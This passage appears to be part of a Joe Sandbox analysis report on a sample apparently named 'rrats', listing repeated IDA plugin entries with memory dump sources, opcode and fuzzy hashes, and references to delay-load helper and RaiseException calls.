                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                              • Instruction ID: d4f675eeeaa327df9ebf077e12d75ccae46746ee5b3912faf4c5acfddca816fe
                                                              • Opcode Fuzzy Hash: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                              • Instruction Fuzzy Hash: 26B012F125C101AC3504510F2D02DFB01CDC0C4F10B30C03FF809C02C1EC41AD016432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fb235bfd657cd4d6dd46918ebb1b042cc3579b8d7da26fd5581edffa57277bae
                                                              • Instruction ID: baae11db1d63f6a3aa3c1f99fc16ff98a3e7667a73fbcbc12a95024ac9fbc70c
                                                              • Opcode Fuzzy Hash: fb235bfd657cd4d6dd46918ebb1b042cc3579b8d7da26fd5581edffa57277bae
                                                              • Instruction Fuzzy Hash: 1FB012E125C101AC3504510E6C03DFB014DC0C8F10730C43FF809C12C1E840AC406432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                              • Instruction ID: 4f64887353dc7eda4b0924be154f0a17439239bdf57bc9bebd371a9dd299a57b
                                                              • Opcode Fuzzy Hash: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                              • Instruction Fuzzy Hash: 3EB012E125D541AC3508910E2C02DFB014EC0C5F10B30C03FFC09C02C1E840EC006472
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                              • Instruction ID: 6fdf30107f5f7a0ab7adbd60151e70604b03f817046244992d9388ecb2c4eabc
                                                              • Opcode Fuzzy Hash: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                              • Instruction Fuzzy Hash: FCB012F125D641BC3548920E2C02DFB014EC0C4F10B30C13FF809C02C1E840AC446432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                              • Instruction ID: 442f000cfad36dc76575557df7f4efce01fe59498a71b9c80a474985ce7f2ae8
                                                              • Opcode Fuzzy Hash: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                              • Instruction Fuzzy Hash: 66B012E125C101AC3504511E2C02DFF018DC0C5F10730C03FFD09C02C1E840EC006472
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                              • Instruction ID: 75cce6212252205b38927806dc2d070335edd928cf523c67bee5a5c2c3add2dc
                                                              • Opcode Fuzzy Hash: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                              • Instruction Fuzzy Hash: 0CB012E126D541AC3508910E2C02DFB018EC4C8F10B30C03FF80AC02C1E840AC006432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                              • Instruction ID: 17ec28fa73fb479abfc3204f2475adfe905fb9f7f975a2594d5ebf048d24b32e
                                                              • Opcode Fuzzy Hash: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                              • Instruction Fuzzy Hash: 4DB092A1258201AC2504520A2902DBA014DC084F10730C03AB809C02C1E851AD496432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                              • Instruction ID: 1f3e72252a68b9ef126da08d7f7c90eb7ec25693f6ea6828aa50cd0d0a0b5213
                                                              • Opcode Fuzzy Hash: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                              • Instruction Fuzzy Hash: 05B092A1258241AC2544520A2802DBA014DC084F10730C13AB809C02C1E840AC446432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                              • Instruction ID: 54954f5e521f3fd650e58e2a499e97227397e0f9d3614c87a177ad85bd605138
                                                              • Opcode Fuzzy Hash: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                              • Instruction Fuzzy Hash: A0B012F125D101BC3504510E2C02DFB014DC0C5F10730C03FFC09C02C1E840ED006472
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                              • Instruction ID: 96b8672a44ea0195f5d488eec386b830ba78295d5690a10094bf0eabd5253672
                                                              • Opcode Fuzzy Hash: 7289e9bad340b3eb004c2ce48671a6b97ee818788a3ae445e4068d1713e5880a
                                                              • Instruction Fuzzy Hash: 7DB012F125C201BC3544510E2C02DFB014DC0C4F10730C13FF809C02C1E841AD406432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                              • Instruction ID: d0da4a94ed9585ad5e155c879b727526d44408580f9e74b1abbc6075d14e166e
                                                              • Opcode Fuzzy Hash: a6029460613fc59a7bb5410daa6b786540218ec40bf48775ff8587ad732371cc
                                                              • Instruction Fuzzy Hash: F0B012F125C101AC3504510F2C02DFB014DC0C8F10730C03FF909C02C1E840AD006432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                              • Instruction ID: 6263cb9c6bc4e36f9fb4e414a75b651aecde06ec2309e417aefc6f57bd8cb8d4
                                                              • Opcode Fuzzy Hash: 0092d3bf3a923c2289acc96a2abb10ae370aade00933bbbce28ecdc3e6d636bb
                                                              • Instruction Fuzzy Hash: 68B012F125C101AC3504510F2D02EFB014DC0C4F10730C03FF809C02C1EC41AE016432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                              • Instruction ID: a90432b13c7424c93c5682f52a0ff4b028aa7b5c51730e6ac29d16b12f26e2ee
                                                              • Opcode Fuzzy Hash: eaf848348dfc2137704a54981eaa4c1d1dae78f97c7249cc783190bed5ca99d6
                                                              • Instruction Fuzzy Hash: 91B012E1259201BC364492091C42DF7028DC0C0F10730C03FF908C12C0D8408C056473
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                              • Instruction ID: 1aebba32b57e35b42c4a617d7aa5af8bb5b5a3ed7e08cbd9419f3c4ffbb616c6
                                                              • Opcode Fuzzy Hash: ec3eb3d5fac9df20f233ebaf353321e0e95e9c532313468e3932611c85f2a5c5
                                                              • Instruction Fuzzy Hash: D9B012E12591017C3644520A1D42DF7028DC0C0F10730C03FF608C12C0D8414C4A6473
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                              • Instruction ID: 1a08cfd9f41bc63f900238d380bb0c75f6eb00dbb67a9abd348dd2b01f11b1f7
                                                              • Opcode Fuzzy Hash: 260570ea401da8495cdfe103201bb1e6ccd90a4bf4b01532cd27ada055890e16
                                                              • Instruction Fuzzy Hash: 93B012F125A001BC364492095C42DF7028DC0C0F10730803FF808C12C0D8408E016473
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                              • Instruction ID: 714d708a6f1b474d8ffbee7b70506b231c498eb2700660af27be1e86a23fc8ae
                                                              • Opcode Fuzzy Hash: 588b419958b7a016f4b1b47bd0985fc90fd5cf6b88b6ac88977bd929dff0b432
                                                              • Instruction Fuzzy Hash: 33B012D12581017E3104935A1C42DF7015DC5C8F14730403FF408C12C0E8404C095432
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
